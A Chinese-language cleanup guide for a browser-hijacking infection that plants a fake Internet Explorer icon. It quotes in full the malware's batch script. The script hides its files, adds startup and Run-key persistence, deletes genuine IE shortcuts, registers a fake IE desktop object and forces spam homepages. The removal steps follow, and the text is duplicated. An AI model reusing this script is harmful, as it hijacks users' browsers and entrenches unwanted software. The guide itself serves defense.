有时候中毒,桌面上会出现一个无文件名的空白文件(疑似假冒的IE浏览器),且无法删除,前篇讲到Windows7下删除空白文件的方法,但是却治标不治本,注册表删除了一遍,在登录IE还是会再出现空白图标的!所以我在网上搜到了个方法试了试,现在说一下解决办法。
在winrar所在的文件夹中,可以找到Internet expl0orer(不是Internet explorer,多了一个0)、dodo.vbs、doit.vbs、sys.cmd、system.cmd等可以文件,用记事本打开system.cmd或sys.cmd,我们可以看到这样的代码:
那就反操作吧!处理过程:
(1)删除掉上述可疑文件,注意新出现的IE图标还无法删除呢;
(2) 整个删除注册表中HKEY_CLASSES_ROOT\CLSID \{00000108-0000-0010-8000-00AA006DFFFF}项;
(3)搜索注册表中00000108-0000-0010-8000-00AA006DCCCC项和键值,全部删除;
(4)删除HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Run下,有关LABEL.lnk 的键;
(5)修改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main的开始页和默认页的网址,去掉那两个垃圾网页;
(6)修改HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion \Policies\Explorer项下,NoInternetIcon键值为0,即显示IE图标。(7)搜索全盘所有后缀为exe.vbs的文件,即搜索“*.exe.vbs”,出来的都是1KB大小且创建时间一样,全部删除!
(8)修复安装在软件的快捷方式(无论是在桌面上的,还是开始程序中或是快速启动里的),在常规中去掉只读属性,修改目标到软件exe文件。当然也可以删掉快捷方式,重新建,因为软件的主体并没有被病毒破坏。
至此,全部查杀毒过程结束。
在winrar所在的文件夹中,可以找到Internet expl0orer(不是Internet explorer,多了一个0)、dodo.vbs、doit.vbs、sys.cmd、system.cmd等可以文件,用记事本打开system.cmd或sys.cmd,我们可以看到这样的代码:
attrib +r +h +s ".\do.vbs" attrib +r +h +s ".\doit.vbs" attrib +r +h +s ".\start.vbs" attrib +r +h +s ".\system.cmd" copy .\LABEL.lnk "%USERPROFILE%\「开始」菜单\程序\启动\LABEL.lnk"
attrib +r "%USERPROFILE%\「开始」菜单\程序\启动\LABEL.lnk"
copy .\LABEL.lnk "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\LABEL.lnk" attrib +r "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\LABEL.lnk"
attrib -r "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk"
del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk" attrib -r "%USERPROFILE%\桌面\Internet Explorer.lnk"
del "%USERPROFILE%\桌面\Internet Explorer.lnk" attrib -r "%USERPROFILE%\桌面\Internet.lnk" del "%USERPROFILE%\桌面\Internet.lnk"
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}"
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\DefaultIcon" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\InProcServer32" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\InProcServer32" /ve /t REG_SZ /d "%%systemRoot%%\system32\shdocvw.dll" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell" /ve /t REG_SZ /d "打开主页(&H)" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)\Command" /ve /t REG_SZ /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.kuhao123.com/?sys" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\属性 (&R)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\属性 (&R)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\属性 (&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f copy ".\Internet Expl0rer.lnk" "%USERPROFILE%\桌面\Internet Expl0rer.lnk" attrib +r -h -s ".\Internet Expl0rer.lnk" "%USERPROFILE%\桌面\Internet Expl0rer.lnk" attrib -r "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" copy ".\Internet Expl0rer.lnk" "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Expl0rer.lnk" attrib +r -h -s "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Expl0rer.lnk" REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Desktop\NameSpace\{00000108-00 00-0010-8000-00AA006DCCCC}" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\DefaultIcon" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\InProcServer32" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\InProcServer32" /ve /t REG_SZ /d "%%systemRoot%%\system32\shdocvw.dll" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell" /ve /t REG_SZ /d "打开主页(&H)" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)\Command" /ve /t REG_SZ /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.kuhao123.com/?sys" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\属性 (&R)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\属性 (&R)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\属性 (&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "Default Action" /t reg_sz /d "C:\Program Files\Common Files\LABEL.lnk" /f REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.kuhao123.com/?home" /f REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t REG_SZ /d "http://www.9281.net/?home" /f
那就反操作吧!处理过程:
(1)删除掉上述可疑文件,注意新出现的IE图标还无法删除呢;
(2) 整个删除注册表中HKEY_CLASSES_ROOT\CLSID \{00000108-0000-0010-8000-00AA006DFFFF}项;
(3)搜索注册表中00000108-0000-0010-8000-00AA006DCCCC项和键值,全部删除;
(4)删除HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Run下,有关LABEL.lnk 的键;
(5)修改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main的开始页和默认页的网址,去掉那两个垃圾网页;
(6)修改HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion \Policies\Explorer项下,NoInternetIcon键值为0,即显示IE图标。(7)搜索全盘所有后缀为exe.vbs的文件,即搜索“*.exe.vbs”,出来的都是1KB大小且创建时间一样,全部删除!
(8)修复安装在软件的快捷方式(无论是在桌面上的,还是开始程序中或是快速启动里的),在常规中去掉只读属性,修改目标到软件exe文件。当然也可以删掉快捷方式,重新建,因为软件的主体并没有被病毒破坏。
至此,全部查杀毒过程结束。